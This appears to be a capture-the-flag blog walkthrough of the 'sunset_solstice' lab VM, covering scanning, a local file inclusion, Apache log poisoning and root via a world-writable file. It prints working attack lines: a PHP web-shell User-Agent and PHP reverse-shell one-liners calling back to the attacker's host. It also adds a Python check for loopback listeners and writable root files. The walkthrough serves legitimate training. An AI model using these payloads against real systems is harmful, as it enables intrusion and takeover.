sunset_solstice VM

Information gathering

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.151 --proxies http://192.168.56.151:3128
Not shown: 65525 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2121/tcp open ccproxy-ftp
3128/tcp open squid-http
8593/tcp open unknown
54787/tcp open unknown
MAC Address: 08:00:27:40:D0:9B (Oracle VirtualBox virtual NIC)

Quite a few open ports. Continue with nmap:

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nmap -sT -sV -sC -O -p21,22,25,80,139,445,2121,3128,8593,54787,62524 192.168.56.151
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 21:41 EDT
Nmap scan report for 192.168.56.151
Host is up (0.00045s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.6
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.56.151:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:a7:37:fd:55:6c:f8:ea:03:f5:10:bc:94:32:07:18 (RSA)
| 256 ab:da:6a:6f:97:3f:b2:70:3e:6c:2b:4b:0c:b7:f6:4c (ECDSA)
|_ 256 ae:29:d4:e3:46:a1:b1:52:27:83:8f:8f:b0:c4:36:d1 (ED25519)
25/tcp open smtp Exim smtpd 4.92
| smtp-commands: solstice Hello nmap.scanme.org [192.168.56.106], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ftp pyftpdlib 1.5.6
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.56.151:2121
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drws------ 2 www-data www-data 4096 Jun 18 2020 pub
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
62524/tcp open tcpwrapped
MAC Address: 08:00:27:40:D0:9B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: solstice; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: \x00
| NetBIOS computer name: SOLSTICE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-10-09T21:41:29-04:00
| smb2-time:
| date: 2023-10-10T01:41:30
|_ start_date: N/A
|_clock-skew: mean: 1h19m58s, deviation: 2h18m33s, median: -1s
|_nbstat: NetBIOS name: SOLSTICE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

Port 2121 allows anonymous login, 3128 is a forwarding proxy, 8593 runs a PHP web service, and there is SMB on 139 and 445. Remember to look up the product names and versions for known vulnerabilities as well, for example Exim smtpd 4.92 and pyftpdlib 1.5.6 here. Let's run nmap's built-in vuln scripts.

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nmap --script=vuln -p21,22,25,80,139,445,2121,3128,8593,54787,62524 192.168.56.151
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 21:48 EDT

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
| Exim version: 4.92
| Exim heap overflow vulnerability (CVE-2010-4344):
| Exim (CVE-2010-4344): NOT VULNERABLE
| Exim privileges escalation vulnerability (CVE-2010-4345):
| Exim (CVE-2010-4345): NOT VULNERABLE
|_ To confirm and exploit the vulnerabilities, run with --script-args='smtp-vuln-cve2010-4344.exploit'
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2121/tcp open ccproxy-ftp
3128/tcp open squid-http
8593/tcp open unknown
54787/tcp open unknown
62524/tcp closed unknown
MAC Address: 08:00:27:40:D0:9B (Oracle VirtualBox virtual NIC)

Host script results:
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

Nothing useful. The smb-vuln-regsvc-dos "VULNERABLE" result is noise on a Samba host: that script targets the Windows 2000 registry service, and a crash would not get us a shell anyway. Let's try the dedicated SMB scripts:

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.56.151
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 23:12 EDT
Nmap scan report for 192.168.56.151
Host is up (0.00013s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2121/tcp open ccproxy-ftp
3128/tcp open squid-http
MAC Address: 08:00:27:40:D0:9B (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.56.151\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Samba 4.9.5-Debian)
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.56.151\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>

The SMB scan did not turn up any useful users or paths (anonymous READ/WRITE on IPC$ is normal for Samba; it is the named-pipe share, not a file share).

Anonymous FTP login

Let's look at anonymous FTP login:

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ ftp 192.168.56.151 2121
Connected to 192.168.56.151.
220 pyftpdlib 1.5.6 ready.
Name (192.168.56.151:kali): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Type set to: Binary.
ftp> ls
229 Entering extended passive mode (|||55617|).
125 Data connection already open. Transfer starting.
drws------ 2 www-data www-data 4096 Jun 18 2020 pub
226 Transfer complete.
ftp> cd pub
250 "/pub" is the current directory.
ftp> ls
229 Entering extended passive mode (|||36105|).
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp> pwd
Remote directory: /pub

Anonymous login on port 21 asks for a password; on port 2121 anonymous login works, but there is only one directory and it is empty. I tried uploading a file and got a permission error. On to the web services.

Web penetration

Port 80:

The page shows a product name and version number, so I searched the exploit databases.

There is a SQL injection exploit, but when I tried it, the injectable URL turned out to be the login page, and requesting that URL directly returns 403.

I also tried using port 3128 as a proxy to reach port 80 and the injectable URL; nothing new, the target URL is still unreachable.

Directory brute-forcing

Let's try directory brute-forcing:

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo gobuster dir -u http://192.168.56.151/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

===============================================================
[+] Url: http://192.168.56.151/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
/app (Status: 301) [Size: 314] [--> http://192.168.56.151/app/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.151/javascript/]
/backup (Status: 301) [Size: 317] [--> http://192.168.56.151/backup/]
/server-status (Status: 403) [Size: 279]

All of these paths return 403; dirsearch found nothing either.

I also brute-forced directories on port 8593, with no results.

Local file inclusion

The URL on this port looks a bit odd, so let's test whether it allows command execution or file inclusion.

It is a file inclusion vulnerability. I also checked for remote file inclusion: only local file inclusion works.

Next I tried to read some likely sensitive files, mainly following AutoWordlists: SSH private keys, bash history files, the shadow file, a possible phpIPAM config file at /var/www/html/phpIPAM/config.php (path guessed from online install guides), and a few Apache log paths. None of them paid off.

With the usernames collected from the passwd file I also tried brute-forcing FTP and SSH, but it was taking too long and I stopped each after about ten minutes.

Reverse shell through the log file

None of this worked, so I looked at a writeup and found that the Apache log is readable. Back to AutoWordlists, searched for apache, and tried the paths one by one:

http://192.168.56.151:8593/index.php?book=../../../../var/log/apache2/access.log returned the log file.

Note: because of my earlier directory brute-forcing the log was very large, so I restored a VM snapshot.

Use Burp Suite to modify the User-Agent:

GET / HTTP/1.1
Host: 192.168.56.151
User-Agent: Mozilla/5.0 <?php system($_GET['cmd']); ?> Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=dis82fr2akr5lpn6666uuug2ou
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 25 Jun 2020 14:45:19 GMT
If-None-Match: "128-5a8e9a431c517-gzip"

Looking at the access log through the LFI again, the PHP code is not visible in the output, which shows it was parsed and executed when the file was included. Now build the payload:

http://192.168.56.151:8593/index.php?book=../../../../var/log/apache2/access.log&cmd=id

Note: it is easy to reflexively request ?cmd=id on its own, in which case the parameter never reaches the planted code. The cmd parameter has to be appended to the same request as the book parameter that includes the log. Read the URL structure carefully; a mis-built payload wastes a lot of time in debugging.

Next, the reverse shell:

GET /index.php?book=../../../../var/log/apache2/access.log&cmd=php+-r+'$sock%3dfsockopen("192.168.56.106",443)%3bexec("sh+<%263+>%263+2>%263")%3b' HTTP/1.1

I first tried several of the PHP one-liners from Online - Reverse Shell Generator (revshells.com); some connected back and dropped immediately. After trying a few different ones I got a stable shell.

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.151] 52314
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:40:d0:9b brd ff:ff:ff:ff:ff:ff
inet 192.168.56.151/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 596sec preferred_lft 596sec
inet6 fe80::a00:27ff:fe40:d09b/64 scope link
valid_lft forever preferred_lft forever
uname -a
Linux solstice 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
python -c "import pty;pty.spawn('/bin/bash')"
www-data@solstice:/home/miguel$ sudo -l
sudo -l
[sudo] password for www-data:

Privilege escalation: information gathering

Checked SUID binaries, cron jobs, files under the web root and the home directories: nothing, and user.txt cannot be read as www-data anyway. Straight to linpeas.

linpeas turned up a few points of interest:

1. gcc is available
2. It suggests the [CVE-2019-13272] PTRACE_TRACEME kernel exploit
3. 127.0.0.1:57 -t /var/tmp/sv/ : a service is listening on port 57
4. /var/tmp contains several service programs

A config file under the web root:

www-data@solstice:~/html/phpIPAM$ cat config.php
cat config.php
Try harder!
www-data@solstice:/var/tmp$ ls -liha
ls -liha
total 36K
524470 drwxrwxrwt 9 root root 4.0K Oct 11 03:39 .
524289 drwxr-xr-x 12 root root 4.0K Jun 13 2020 ..
527622 drwxr-xr-x 2 www-data www-data 4.0K Jun 25 2020 fake_ftp
524448 drws------ 3 www-data www-data 4.0K Jun 17 2020 ftp
526416 drwsrwxrwx 2 root root 4.0K Jun 26 2020 sv
527778 drwx------ 3 root root 4.0K Oct 11 02:56 systemd-private-eb3c320d1bd44bd19d2a522d01716beb-apache2.service-B3KLFo
524319 drwx------ 3 root root 4.0K Oct 11 02:56 systemd-private-eb3c320d1bd44bd19d2a522d01716beb-systemd-timesyncd.service-H8nVn6
524444 drwxr-xr-x 2 www-data www-data 4.0K Jun 26 2020 webserver
524447 drwxr-xr-x 3 www-data www-data 4.0K Jun 19 2020 webserver_2

Let's look at the service on port 57 first; it is bound to loopback, so it is not directly exposed on the web.

www-data@solstice:/var/tmp/sv$ ls -alih
ls -alih
total 12K
526416 drwsrwxrwx 2 root root 4.0K Jun 26 2020 .
524470 drwxrwxrwt 9 root root 4.0K Oct 11 03:39 ..
527621 -rwxrwxrwx 1 root root 36 Jun 19 2020 index.php
www-data@solstice:/var/tmp/sv$ cat index.php
cat index.php
<?php
echo "Under construction";
?>
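The two findings that matter here are a listener bound only to 127.0.0.1 (invisible to the nmap scan from outside) and a file that everyone can write but root owns and another process executes. The following is an added example (not part of the original writeup) that checks for both without linpeas: it parses /proc/net/tcp for LISTEN sockets and walks a directory for regular files writable by others. The embedded /proc/net/tcp sample is constructed to resemble this box (port 57 on loopback, 80 and 8593 on all interfaces); the uid column in it is made up.

```python
import os
import socket
import stat

# Constructed sample of /proc/net/tcp shaped like this box: port 57
# (0x0039) bound to 127.0.0.1 only, 80 (0x0050) and 8593 (0x2191) on
# 0.0.0.0, plus one established SSH connection. The uid column is made up.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0039 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 17520 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 17001 1 0000000000000000 100 0 0 10 0
   2: 00000000:2191 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 17610 1 0000000000000000 100 0 0 10 0
   3: 9738A8C0:0016 6A38A8C0:CC8E 01 00000000:00000000 00:00000000 00000000     0        0 18011 1 0000000000000000 20 4 30 10 -1
"""

LISTEN = "0A"  # socket state code for LISTEN in /proc/net/tcp


def parse_listeners(proc_net_tcp_text):
    """Return [(ip, port, uid)] for every LISTEN socket in /proc/net/tcp.
    The kernel prints IPv4 addresses as little-endian hex, so the bytes
    are reversed before formatting."""
    listeners = []
    for line in proc_net_tcp_text.splitlines()[1:]:   # skip header row
        fields = line.split()
        if len(fields) < 8 or fields[3] != LISTEN:
            continue
        ip_hex, port_hex = fields[1].split(":")
        ip = socket.inet_ntoa(bytes.fromhex(ip_hex)[::-1])
        listeners.append((ip, int(port_hex, 16), int(fields[7])))
    return listeners


def loopback_only(listeners):
    """Keep the listeners an external port scan would never see."""
    return [l for l in listeners if l[0].startswith("127.")]


def others_writable(root_dir, owner_uid=None):
    """Walk root_dir and return (path, uid, mode) for regular files with
    the 'other write' bit set. With owner_uid=0 this reduces to the
    root-owned but world-writable files such as /var/tmp/sv/index.php."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & stat.S_IWOTH:
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            hits.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return hits


if __name__ == "__main__":
    text = SAMPLE_PROC_NET_TCP
    if os.path.exists("/proc/net/tcp"):          # use the live table when present
        with open("/proc/net/tcp") as fh:
            text = fh.read()
    for ip, port, uid in loopback_only(parse_listeners(text)):
        print(f"loopback-only listener {ip}:{port} (uid {uid})")
    for path, uid, mode in others_writable("/var/tmp", owner_uid=0):
        print(f"root-owned, world-writable: {path} {mode}")
```

A loopback listener by itself is only a lead; it becomes a privilege escalation when, as here, the files it serves are writable by the account you already have and the service runs as a more privileged user.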

Privilege escalation via misconfigured web file permissions

index.php is a root-owned file with 777 permissions, and it is the document root of the service bound to port 57, so it looks exploitable: write reverse-shell code into the file and let that service execute it. I hit the earlier problem again (the shell dropped as soon as it connected) and cycled through a few one-liners until one held. Start the listener first, then trigger it with curl:

www-data@solstice:/var/tmp/sv$ echo '<?php $sock=fsockopen("192.168.56.106",444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>' > index.php

www-data@solstice:/var/tmp/sv$ cat index.php
<?php $sock=fsockopen("192.168.56.106",444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
www-data@solstice:/var/tmp/sv$ curl http://127.0.0.1:57/index.php

Reverse shell successful:

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nc -lvnp 444
listening on [any] 444 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.151] 47580
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:40:d0:9b brd ff:ff:ff:ff:ff:ff
inet 192.168.56.151/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 413sec preferred_lft 413sec
inet6 fe80::a00:27ff:fe40:d09b/64 scope link
valid_lft forever preferred_lft forever
uname -a
Linux solstice 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux

Find the flag files:

cd /root
ls -liah
total 60K
131078 drwx------ 9 root root 4.0K Jun 26 2020 .
2 drwxr-xr-x 18 root root 4.0K Apr 21 2020 ..
142795 lrwxrwxrwx 1 root root 9 Jun 26 2020 .bash_history -> /dev/null
131081 -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
267055 drwx------ 3 root root 4.0K Jun 17 2020 .cache
262148 drwxr-xr-x 3 root root 4.0K Jun 13 2020 .config
269685 drwxr-xr-x 2 root root 4.0K Jun 19 2020 ftp
262531 drwx------ 3 root root 4.0K Jun 18 2020 .gnupg
142644 drwxr-xr-x 3 root root 4.0K Jun 13 2020 .local
142642 -rw------- 1 root root 2.8K Jun 19 2020 .mysql_history
131080 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
142794 -rw-r--r-- 1 root root 113 Jun 26 2020 root.txt
142775 -rw-r--r-- 1 root root 66 Jun 13 2020 .selected_editor
269682 drwx------ 2 root root 4.0K Jun 19 2020 .ssh
142776 -rw-r--r-- 1 root root 173 Jun 25 2020 .wget-hsts
267135 drwxr-xr-x 4 root root 4.0K Jun 18 2020 .wine
python -c "import pty;pty.spawn('/bin/bash')"
root@solstice:~# cat root.txt
cat root.txt

No ascii art for you >:(

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

f950998f0d484a2ef1ea83ed4f42bbca

root@solstice:~# cat /home/miguel/user.txt
cat /home/miguel/user.txt
c0e1f61ff8e753d8b27615bdc4f25794

Summary

The sticking point was getting a reverse shell through the local file inclusion: I did not try enough Apache log paths, so that attack path stalled. The rest of this box was not especially complicated.

Links

A handy cheat sheet from someone else: 07.端口对应渗透(端口渗透备忘录) (port-based pentesting cheat sheet) · d4m1ts 知识库 (gm7.org)

OffSec has a video walkthrough: Solstice VM - Walkthrough with S1REN. - YouTube


sunset_solstice VM
https://i3eg1nner.github.io/2023/10/42e0d8744dc9.html
Author: I3eg1nner
Published: 2023-10-10